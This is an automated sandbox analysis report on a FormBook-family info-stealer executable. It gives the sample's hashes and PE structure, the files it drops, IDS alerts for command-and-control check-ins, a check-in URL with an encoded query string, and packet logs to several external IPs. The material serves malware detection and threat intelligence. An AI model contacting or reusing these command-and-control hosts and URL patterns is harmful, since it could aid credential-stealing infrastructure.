                                                            http://www.dojodigitize.shop/zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLftrue
                                                            • Avira URL Cloud: safe
                                                            unknown
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589101
Start date and time: 2025-01-11 09:34:58 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 37s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: QsBdpe1gK5.exe (renamed because original name is a hash value)
Original Sample Name: 2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/11
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 117
• Number of non-executed functions: 290
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.107.246.45
                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target oPkpFmCiYVL.exe, PID 5016 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time      Type             Description
03:35:51  API Interceptor  2x Sleep call for process: QsBdpe1gK5.exe modified
03:36:44  API Interceptor  11258975x Sleep call for process: find.exe modified

Process:C:\Users\user\Desktop\QsBdpe1gK5.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1216
Entropy (8bit):5.34331486778365
Encrypted:false
SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:1330C80CAAC9A0FB172F202485E9B1E8
SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:true
Reputation:high, very likely benign file
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process:C:\Windows\SysWOW64\find.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Reputation:high, very likely benign file
                                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Entropy (8bit):7.8116501465040376
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                      • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                      File name:QsBdpe1gK5.exe
                                                                                                                                      File size:798'720 bytes
                                                                                                                                      MD5:4bc2f58c4ac26d5d012f166d263d3b72
                                                                                                                                      SHA1:91d3241e1edf478dae9ba4d2731079d70f8100b7
                                                                                                                                      SHA256:2b7153bd3b38f85441844e5b9eb277b441357b5725adf4505e8631f6d34d0606
                                                                                                                                      SHA512:8d01dfee58d7e809415584d04e62854efbcfbf30bda5ef90554ba44679b4898adac036848c427dd9a7dfbb0e598988f9de9c4143db1e09d34438b0f1d42817e2
                                                                                                                                      SSDEEP:24576:qwkFuB7u2ChcVz/U8OVZSGmg62mqrK1zGUxj:qPMx+cVz/UBvmg62TAL
                                                                                                                                      TLSH:FD0502452657DA12D4E24BB08AA2D3F857388D8DDE22C313DBDD7DEBBD377062480296
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...4.................0..&..........fE... ...`....@.. ....................................@................................
                                                                                                                                      Icon Hash:90cececece8e8eb0
                                                                                                                                      Entrypoint:0x4c4566
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0xC8C08E34 [Wed Sep 23 04:55:16 2076 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:4
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:4
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:4
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                      Instruction
                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc4514 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc6000 | 0x59c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc3274 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc256c | 0xc2600 | ebf4358341791774acaa09277e4a5c02 | False | 0.932125452170418 | data | 7.8179183719331435 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc6000 | 0x59c | 0x600 | 1560ba9e8d6890516c1eaefcf3ae177e | False | 0.4186197916666667 | data | 4.0663739395569625 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc8000 | 0xc | 0x200 | 9ffd489440ae87cbe91b8a58aab744d3 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc6090 | 0x30c | data | | | 0.4371794871794872
RT_MANIFEST | 0xc63ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T09:36:21.767422+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49741 | 15.197.142.173 | 80 | TCP
2025-01-11T09:36:45.094735+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49745 | 104.21.80.1 | 80 | TCP
2025-01-11T09:37:06.343691+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49803 | 13.248.169.48 | 80 | TCP
2025-01-11T09:37:19.665181+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 49937 | 173.0.157.187 | 80 | TCP
2025-01-11T09:37:49.081500+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50024 | 13.248.169.48 | 80 | TCP
2025-01-11T09:38:03.309833+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50028 | 38.47.233.4 | 80 | TCP
2025-01-11T09:38:16.641140+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50032 | 199.192.23.123 | 80 | TCP
2025-01-11T09:38:29.971877+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50036 | 104.21.36.239 | 80 | TCP
2025-01-11T09:38:44.008084+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50040 | 208.91.197.27 | 80 | TCP
2025-01-11T09:38:58.165890+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50044 | 13.248.169.48 | 80 | TCP
2025-01-11T09:39:11.812195+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50048 | 54.67.42.145 | 80 | TCP
2025-01-11T09:39:25.214471+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50052 | 193.180.209.15 | 80 | TCP
2025-01-11T09:39:39.185113+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50056 | 208.91.197.27 | 80 | TCP
2025-01-11T09:39:52.587233+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50060 | 104.21.88.139 | 80 | TCP
2025-01-11T09:40:01.576894+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50061 | 15.197.142.173 | 80 | TCP
2025-01-11T09:40:14.834725+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50065 | 104.21.80.1 | 80 | TCP
2025-01-11T09:40:27.958740+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.4 | 50069 | 13.248.169.48 | 80 | TCP
                                                                                                                                      Jan 11, 2025 09:37:46.070619106 CET5002380192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:46.086414099 CET5002380192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:46.091551065 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091583014 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091609955 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091636896 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091664076 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091690063 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091737032 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091763973 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.091808081 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.582156897 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.582463980 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.582525969 CET5002380192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:46.582937002 CET805002313.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.582979918 CET5002380192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:46.886328936 CET805002213.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:46.886389971 CET5002280192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:47.592603922 CET5002380192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:48.614042997 CET5002480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:48.619434118 CET805002413.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:48.619534016 CET5002480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:48.632308960 CET5002480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:48.637309074 CET805002413.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:49.081126928 CET805002413.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:49.081161022 CET805002413.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:49.081500053 CET5002480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:49.084856987 CET5002480192.168.2.413.248.169.48
                                                                                                                                      Jan 11, 2025 09:37:49.090622902 CET805002413.248.169.48192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:54.461565971 CET5002580192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:54.466326952 CET805002538.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:54.466511011 CET5002580192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:54.481193066 CET5002580192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:54.486042976 CET805002538.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:55.983339071 CET5002580192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:56.030160904 CET805002538.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:56.096601963 CET805002538.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:56.096687078 CET5002580192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:57.007169008 CET5002680192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:57.012176991 CET805002638.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:57.012280941 CET5002680192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:57.026593924 CET5002680192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:57.031718969 CET805002638.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:57.897891998 CET805002638.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:57.898056984 CET805002638.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:57.898099899 CET5002680192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:58.530333042 CET5002680192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:59.670906067 CET5002780192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:59.676014900 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.676167965 CET5002780192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:59.837841988 CET5002780192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:37:59.842729092 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842741966 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842758894 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842767000 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842845917 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842854977 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842895031 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842904091 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:37:59.842914104 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:00.591064930 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:00.597363949 CET805002738.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:00.597640038 CET5002780192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:01.342845917 CET5002780192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:02.402183056 CET5002880192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:02.407229900 CET805002838.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:02.407476902 CET5002880192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:02.490263939 CET5002880192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:02.499288082 CET805002838.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:03.309673071 CET805002838.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:03.309709072 CET805002838.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:03.309833050 CET5002880192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:03.315399885 CET5002880192.168.2.438.47.233.4
                                                                                                                                      Jan 11, 2025 09:38:03.320638895 CET805002838.47.233.4192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:08.355276108 CET5002980192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:08.360208035 CET8050029199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:08.360347033 CET5002980192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:08.375169992 CET5002980192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:08.380115986 CET8050029199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:08.962650061 CET8050029199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:08.962708950 CET8050029199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:08.963280916 CET5002980192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:09.889457941 CET5002980192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:10.908334970 CET5003080192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:10.913388014 CET8050030199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:10.914403915 CET5003080192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:10.927804947 CET5003080192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:10.932749033 CET8050030199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:11.524224043 CET8050030199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:11.524255991 CET8050030199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:11.524293900 CET5003080192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:12.436378002 CET5003080192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:13.460808992 CET5003180192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:13.465811014 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.465965033 CET5003180192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:13.479942083 CET5003180192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:13.484921932 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.484956980 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.484986067 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.485059977 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.485088110 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.485121012 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.485173941 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.485202074 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:13.485229015 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:14.130098104 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:14.130191088 CET8050031199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:14.130347013 CET5003180192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:14.984626055 CET5003180192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:16.002078056 CET5003280192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:16.007188082 CET8050032199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:16.007285118 CET5003280192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:16.016175985 CET5003280192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:16.021022081 CET8050032199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:16.639950037 CET8050032199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:16.641091108 CET8050032199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:16.641139984 CET5003280192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:16.642810106 CET5003280192.168.2.4199.192.23.123
                                                                                                                                      Jan 11, 2025 09:38:16.648094893 CET8050032199.192.23.123192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:21.838637114 CET5003380192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:21.843568087 CET8050033104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:21.843647003 CET5003380192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:21.857431889 CET5003380192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:21.862303972 CET8050033104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:22.331737995 CET8050033104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:22.332499027 CET8050033104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:22.332578897 CET5003380192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:23.373858929 CET5003380192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:24.392986059 CET5003480192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:24.397910118 CET8050034104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:24.398041964 CET5003480192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:24.411268950 CET5003480192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:24.416074991 CET8050034104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:24.892164946 CET8050034104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:24.892997980 CET8050034104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:24.893213987 CET5003480192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:25.920710087 CET5003480192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:26.939744949 CET5003580192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:38:26.944781065 CET8050035104.21.36.239192.168.2.4
                                                                                                                                      Jan 11, 2025 09:38:26.944933891 CET5003580192.168.2.4104.21.36.239
                                                                                                                                      Jan 11, 2025 09:39:20.967916965 CET5005080192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:21.987760067 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:21.992667913 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:21.992729902 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:22.018497944 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:22.023418903 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023433924 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023514986 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023525953 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023535013 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023669004 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.023711920 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.026909113 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.026918888 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.623862982 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.624547958 CET8050051193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:22.624784946 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:23.530359983 CET5005180192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.553919077 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.559300900 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:24.559370995 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.570935011 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:24.579278946 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:25.214323044 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:25.214345932 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:25.214471102 CET5005280192.168.2.4193.180.209.15
                                                                                                                                      Jan 11, 2025 09:39:25.218029022 CET5005280192.168.2.4193.180.209.15
